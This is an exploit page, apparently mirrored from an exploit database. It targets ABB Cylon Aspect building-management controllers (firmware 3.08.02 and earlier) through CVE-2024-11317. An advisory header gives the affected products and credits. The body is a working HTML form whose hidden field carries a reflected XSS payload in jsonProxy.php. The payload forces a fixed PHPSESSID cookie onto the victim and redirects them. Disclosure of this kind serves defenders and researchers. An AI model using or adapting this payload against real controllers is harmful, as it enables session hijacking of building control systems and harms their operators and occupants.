Exploit for ABB Cylon Aspect 3.08.02 PHP Session Fixation CVE-2024-11317

## https://sploitus.com/exploit?id=PACKETSTORM:189097
<html>
    <!--
    
    ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability
    
    
    Vendor: ABB Ltd.
    Product web page: https://www.global.abb
    Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                      Firmware: <=3.08.02
    
    Summary: ASPECT is an award-winning scalable building energy management
    and control solution designed to allow users seamless access to their
    building data through standard building protocols including smart devices.
    
    Desc: The ABB Cylon Aspect BMS/BAS controller is vulnerable to session
    fixation, allowing an attacker to set a predefined PHPSESSID value. An
    attacker can leverage an unauthenticated reflected XSS vulnerability in
    jsonProxy.php to inject a crafted request, forcing the victim to adopt
    a fixated session.
    
    Tested on: GNU/Linux 3.15.10 (armv7l)
               GNU/Linux 3.10.0 (x86_64)
               GNU/Linux 2.6.32 (x86_64)
               Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
               Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
               PHP/7.3.11
               PHP/5.6.30
               PHP/5.4.16
               PHP/4.4.8
               PHP/5.3.3
               AspectFT Automation Application Server
               lighttpd/1.4.32
               lighttpd/1.4.18
               Apache/2.2.15 (CentOS)
               OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
               OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
               ErgoTech MIX Deployment Server 2.0.0
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2025-5916
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5916.php
    CVE ID: CVE-2024-11317
    CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-11317
    
    
    21.04.2024
    
    -->
    
    
    
                     P   R   O   J   E   C   T
    
                            .|
                            | |
                            |'|            ._____
                    ___    |  |            |.   |' .---"|
            _    .-'   '-. |  |     .--'|  ||   | _|    |
         .-'|  _.|  |    ||   '-__  |   |  |    ||      |
         |' | |.    |    ||       | |   |  |    ||      |
     ____|  '-'     '    ""       '-'   '-.'    '`      |____
    ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
             ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
             ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                                   
    
    <body>
      <!-- Session ID in a cookie (Client-side script) OWASP Ref.: -->
      <form action="http://192.168.73.31/jsonProxy.php" method="GET">
        <input type="hidden" name="application" value="zeroscience" />
        <input type="hidden" name="query" value="<script>document.cookie="PHPSESSID=22222222225555555555111111; path=/"%0A%0Dwindow.location.href="/"</script>" />
        <input type="submit" value="Fix!" />
      </form>
    </body>
    </html>